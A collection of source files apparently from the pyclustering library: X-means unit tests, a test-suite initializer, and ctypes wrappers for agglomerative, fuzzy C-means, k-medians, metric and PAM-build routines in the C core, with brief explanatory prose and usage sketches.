XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricEuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricManhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricChebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricMinkowski2(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricMinkowski4(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=4)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricCanberra(self):
metric = distance_metric(type_metric.CANBERRA)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricChiSquare(self):
metric = distance_metric(type_metric.CHI_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricGower(self):
metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricEuclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricEuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric, alpha=0.1, beta=0.1)
def testMndlClusterAllocationSampleSimple1MetricManhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricChebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricMinkowski2(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricMinkowski4(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=4)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricCanberra(self):
metric = distance_metric(type_metric.CANBERRA)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricChiSquare(self):
metric = distance_metric(type_metric.CHI_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric, alpha=0.1, beta=0.1, random_state=1000)
def testMndlClusterAllocationSampleSimple1MetricGower(self):
metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testBicWrongStartClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlSampleSimple1WithoutInitialCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlWrongStartClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testBicClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple2Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlWrongStartClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7]], [10, 5, 8], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testBicClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple3Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [5.9, 5.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationMaxLessRealSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 3, False)
def testBicWrongStartClusterClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 4, False)
def testMndlClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.2, beta=0.2)
def testMndlWrongStartClusterClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 4, False, alpha=0.2, beta=0.2)
def testBicClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple4Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationMaxLessRealSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 4.0]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 2, False)
def testMndlClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlWrongStartClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0]], [15, 15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlClusterAllocationMaxLessRealSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 4.0]], None, splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 2, False)
def testBicClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicWrongStartClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0]], [15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, random_state=1000)
def testMndlWrongStartClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0]], [15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, random_state=1000)
def testBicClusterAllocationSampleSimple6(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, [[3.5, 3.5], [3.7, 3.7]], [20, 21], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple6WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, None, [20, 21], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple6(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, [[3.5, 3.5], [3.7, 3.7]], [20, 21], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlClusterAllocationSampleSimple6WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, None, [20, 21], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testBicClusterAllocationSampleSimple7(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, [[1], [2]], [10, 10], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple7WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, None, [10, 10], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple7(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, [[1], [2]], [10, 10], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.01, beta=0.01)
def testMndlClusterAllocationSampleSimple7WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, None, [10, 10], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.01, beta=0.01)
def testBicClusterAllocationSampleSimple8(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[-2.0], [3.0], [6.0], [12.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple8WrongAmountCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple8WrongAmountCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.2, beta=0.2)
def testBicClusterAllocationSampleSimple8WrongAmountCentersRandomState(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, random_state=1000)
def testMndlClusterAllocationSampleSimple8WrongAmountCentersRandomState(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, random_state=1000)
def testBicClusterAllocationSampleSimple9(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [[3.0], [6.0]], [10, 20], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple9WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, None, [10, 20], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple10(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, [[0.0, 0.3], [4.5, 3.4], [10.1, 10.6]], [11, 11, 11], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple10WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, None, [11, 11, 11], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2], [3.0, 0.0]], [400, 400], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicWrongStartClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2]], [400, 400], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2], [3.0, 0.0]], [400, 400], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMathErrorDomainBic(self):
# This is a test for a bug found in #407: 0.0 passed to the logarithm function.
XmeansTestTemplates.templateLengthProcessData([[0], [0], [10], [10], [20], [20]], [[5], [20]], [2, 2, 2], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMathErrorDomainMndl(self):
XmeansTestTemplates.templateLengthProcessData([[0], [0], [10], [10], [20], [20]], [[5], [20]], [2, 2, 2], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testClusterAllocationOneDimensionData(self):
XmeansTestTemplates.templateClusterAllocationOneDimensionData(False)
def testKmax05Amount3Offset02Initial01(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 3, 2, 1, 2)
def testKmax05Amount5Offset02Initial01(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 5, 2, 1, 5)
def testKmax05Amount5Offset02Initial02(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 5, 2, 2, 5)
def testKmax05Amount10Offset02Initial03(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 3, 5)
def testKmax05Amount10Offset02Initial04(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 4, 5)
def testKmax05Amount10Offset02Initial05(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 5, 5)
def testKmax05Amount20Offset02Initial05(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 20, 10, 2, 5, 5)
def testKmax05Amount01Offset01Initial04(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 1, 1000, 1, 4, 5)
def testPredictOnePoint(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], 4, [0], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[4.1, 1.1]], 4, [1], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 1.9]], 4, [2], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1]], 4, [3], False)
def testPredictTwoPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], 4, [0, 2], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1], [2.1, 1.9]], 4, [3, 2], False)
def test_random_state_1(self):
XmeansTestTemplates.random_state(False, 2, 10, 1)
def test_random_state_2(self):
XmeansTestTemplates.random_state(False, 2, 10, 2)
def test_random_state_4(self):
XmeansTestTemplates.random_state(False, 2, 10, 4)
def test_random_state_32(self):
XmeansTestTemplates.random_state(False, 2, 10, 32)
def test_random_state_1024(self):
XmeansTestTemplates.random_state(False, 2, 10, 1024)
def test_random_state_65536(self):
XmeansTestTemplates.random_state(False, 2, 10, 65536)
def test_incorrect_data(self):
self.assertRaises(ValueError, xmeans, [])
def test_incorrect_centers(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], [])
def test_incorrect_tolerance(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], [[1]], 20, -1)
def test_incorrect_repeat(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], repeat=0)
```
#### File: container/tests/__init__.py
```python
from pyclustering.tests.suite_holder import suite_holder
from pyclustering.container.tests.unit import container_unit_tests
class container_tests(suite_holder):
def __init__(self):
super().__init__()
container_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(container_suite):
container_unit_tests.fill_suite(container_suite)
```
#### File: pyclustering/core/agglomerative_wrapper.py
```python
from ctypes import c_size_t, c_double, POINTER;
from pyclustering.core.wrapper import ccore_library;
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder;
def agglomerative_algorithm(data, number_clusters, link):
pointer_data = package_builder(data, c_double).create();
ccore = ccore_library.get();
ccore.agglomerative_algorithm.restype = POINTER(pyclustering_package);
package = ccore.agglomerative_algorithm(pointer_data, c_size_t(number_clusters), c_size_t(link));
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
```
#### File: pyclustering/core/fcm_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
class fcm_package_indexer:
INDEX_CLUSTERS = 0
INDEX_CENTERS = 1
INDEX_MEMBERSHIP = 2
def fcm_algorithm(sample, centers, m, tolerance, itermax):
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.fcm_algorithm.restype = POINTER(pyclustering_package)
package = ccore.fcm_algorithm(pointer_data, pointer_centers, c_double(m), c_double(tolerance), c_size_t(itermax))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
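The `fcm_package_indexer` class above documents the layout of the package returned by the C core: allocated clusters first, then the final centers, then the membership matrix. A minimal usage sketch, assuming the compiled pyclustering C core library is available; the sample data and parameter values are illustrative:
```python
from pyclustering.core.fcm_wrapper import fcm_algorithm, fcm_package_indexer

# Illustrative data: two well-separated groups of points.
sample = [[1.0, 1.0], [1.2, 0.9], [5.0, 5.1], [5.2, 4.9]]
initial_centers = [[1.0, 1.0], [5.0, 5.0]]

# m=2.0 is the common fuzzifier choice; tolerance and itermax are stop conditions.
result = fcm_algorithm(sample, initial_centers, 2.0, 0.001, 100)

clusters = result[fcm_package_indexer.INDEX_CLUSTERS]
centers = result[fcm_package_indexer.INDEX_CENTERS]
membership = result[fcm_package_indexer.INDEX_MEMBERSHIP]
```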
#### File: pyclustering/core/kmedians_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
def kmedians(sample, centers, tolerance, itermax, metric_pointer):
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.kmedians_algorithm.restype = POINTER(pyclustering_package)
package = ccore.kmedians_algorithm(pointer_data, pointer_centers, c_double(tolerance), c_size_t(itermax), metric_pointer)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result[0], result[1]
```
#### File: pyclustering/core/metric_wrapper.py
```python
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import package_builder, package_extractor, pyclustering_package
from ctypes import c_double, c_size_t, POINTER, c_void_p, CFUNCTYPE
from pyclustering.utils.metric import type_metric
metric_callback = CFUNCTYPE(c_double, POINTER(pyclustering_package), POINTER(pyclustering_package))
class metric_wrapper:
def __init__(self, type_metric_code, arguments, func):
self.__func = lambda p1, p2: func(package_extractor(p1).extract(), package_extractor(p2).extract())
package_arguments = package_builder(arguments, c_double).create()
ccore = ccore_library.get()
ccore.metric_create.restype = POINTER(c_void_p)
self.__pointer = ccore.metric_create(c_size_t(type_metric_code), package_arguments, metric_callback(self.__func))
def __del__(self):
if self.__pointer:
ccore = ccore_library.get()
ccore.metric_destroy(self.__pointer)
def __call__(self, point1, point2):
point_package1 = package_builder(point1, c_double).create()
point_package2 = package_builder(point2, c_double).create()
ccore = ccore_library.get()
ccore.metric_calculate.restype = c_double
return ccore.metric_calculate(self.__pointer, point_package1, point_package2)
def get_pointer(self):
return self.__pointer
@staticmethod
def create_instance(metric):
mtype = metric.get_type()
arguments = []
if mtype == type_metric.MINKOWSKI:
arguments = [metric.get_arguments().get('degree')]
elif mtype == type_metric.GOWER:
arguments = metric.get_arguments().get('max_range')
return metric_wrapper(mtype, arguments, metric.get_function())
```
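A short usage sketch for the wrapper above, assuming the compiled C core is available: `create_instance` translates a Python-side `distance_metric` into its C counterpart, and the resulting object can be called directly or handed to other wrappers through `get_pointer()`. The data points are illustrative:
```python
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.utils.metric import distance_metric, type_metric

metric = metric_wrapper.create_instance(distance_metric(type_metric.MINKOWSKI, degree=2))

# The distance itself is computed on the C side.
distance = metric([0.0, 0.0], [3.0, 4.0])  # 5.0 for Minkowski with degree=2

# The raw pointer is what the other wrappers in this package accept.
pointer = metric.get_pointer()
```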
#### File: pyclustering/core/pam_build_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.converter import convert_data_type
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
def pam_build(sample, amount, pointer_metric, data_type):
pointer_data = package_builder(sample, c_double).create()
c_data_type = convert_data_type(data_type)
ccore = ccore_library.get()
ccore.pam_build_algorithm.restype = POINTER(pyclustering_package)
package = ccore.pam_build_algorithm(pointer_data, c_size_t(amount), pointer_metric, c_data_type)
results = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
if isinstance(results, bytes):
raise RuntimeError(results.decode('utf-8'))
return results[0]
```
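Unlike most wrappers in this package, `pam_build` may receive an error message from the C core as a byte string, which it re-raises as `RuntimeError`. A hedged usage sketch; the data, the medoid amount, and the `'points'` data-type code are illustrative assumptions, and `metric_wrapper` is the helper defined earlier in this package:
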